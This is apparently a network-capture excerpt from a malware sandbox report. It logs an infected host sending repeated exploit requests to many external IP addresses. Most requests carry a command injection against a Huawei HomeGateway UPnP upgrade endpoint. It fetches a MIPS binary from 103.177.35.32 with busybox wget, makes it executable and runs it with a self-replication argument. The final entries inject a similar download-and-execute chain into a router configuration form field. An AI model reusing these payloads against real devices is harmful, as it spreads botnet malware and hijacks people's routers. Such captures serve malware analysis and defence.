                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1601192.168.2.2335630157.253.207.21137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555670023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1602192.168.2.235886841.116.141.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555670023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1603192.168.2.2359148197.238.124.11737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555670023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1604192.168.2.2337016157.78.233.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555685997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1605192.168.2.234520441.95.92.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555699110 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1606192.168.2.2348390157.142.150.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555846930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1607192.168.2.2354620157.99.110.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555903912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1608192.168.2.2351402197.82.102.1637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555929899 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1609192.168.2.2348968222.234.134.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555939913 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1610192.168.2.2352644186.235.187.468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.387725115 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1611192.168.2.2337348130.62.152.2528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.387759924 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
